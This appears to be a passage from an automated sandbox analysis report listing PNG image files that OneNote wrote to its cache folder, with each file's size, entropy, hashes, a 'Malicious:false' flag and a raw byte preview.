                                                                                                                                            SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                                                            MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                                                            SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                                                            SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                                                            SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.*!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=|z7.Z.|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'*..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.*u.j..S.C=...|.....2..(YF........|...*.7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000I.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):7374
                                                                                                                                            Entropy (8bit):7.955141875077912
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                                                            MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                                                            SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                                                            SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                                                            SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..|.|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6...........*..tb.9.*j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G|.......&..0ZK1u8.H.2...Z../..P(....BA..aL|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000J.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1604
                                                                                                                                            Entropy (8bit):7.814570704154439
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                            MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                            SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                            SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                            SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000K.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):5386
                                                                                                                                            Entropy (8bit):7.943706538857394
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                                                            MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                                                            SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                                                            SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                                                            SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....*bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++.*..pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000M.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4181
                                                                                                                                            Entropy (8bit):7.950380155401321
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                                                            MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                                                            SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                                                            SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                                                            SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.*B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_.*..c..n.......?....wa..l...p....E.Ly.}...*...C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...|....*\..O.*....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..*k.Y....z.;?..^...3.4|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000N.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):14553
                                                                                                                                            Entropy (8bit):7.951135681293377
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                                                            MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                                                            SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                                                            SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                                                            SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..|.]....s.6[..H...N@.=M..|`...3./...I.....'..|..K...r|...nX...'.. .G...ib|...MY8|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K*.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.|....?.^..5^}..$.. .....S.@...*<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...|....W<{...g.&'Ca

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000O.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):8184
                                                                                                                                            Entropy (8bit):7.807848176906598
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                                                            MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                                                            SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                                                            SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                                                            SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..*Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000P.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1924
                                                                                                                                            Entropy (8bit):7.836744258175623
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                                                            MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                                                            SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                                                            SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                                                            SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M*..J.....".4*....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o|.?.......;C|.#.../v.H.......o~.{G......H.|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O|.D...

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000Q.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):11886
                                                                                                                                            Entropy (8bit):7.946442244439929
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                                                            MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                                                            SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                                                            SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                                                            SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s|.....C.$@.$.....t.!........8......RR....<...6..P||....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z*.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e...*..UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ)*.(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....|g*..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000R.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2270
                                                                                                                                            Entropy (8bit):7.845368393313232
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                                                            MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                                                            SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                                                            SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                                                            SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W...*.F......@.*.(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!*.&E.....n...=.@..Sp.GF..c*....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~l*k.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N*..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000S.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):16003
                                                                                                                                            Entropy (8bit):7.959532793770661
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                                                            MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                                                            SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                                                            SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                                                            SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..|.....+)..H..C.K... ....x).rU..T..*E...;....*.@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z*.GJ...."@zJ}...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[||...t.T.w *.. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000T.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):13241
                                                                                                                                            Entropy (8bit):7.931391290415517
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                                                            MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                                                            SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                                                            SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                                                            SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......*EX........wo9..9.|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~.*.U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J*.w.mdv.&*..@....R..o/.^..5...x.g.>..ag....GM|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000U.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4190
                                                                                                                                            Entropy (8bit):7.94161730428269
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                                                            MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                                                            SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                                                            SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                                                            SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                                                            Malicious:false
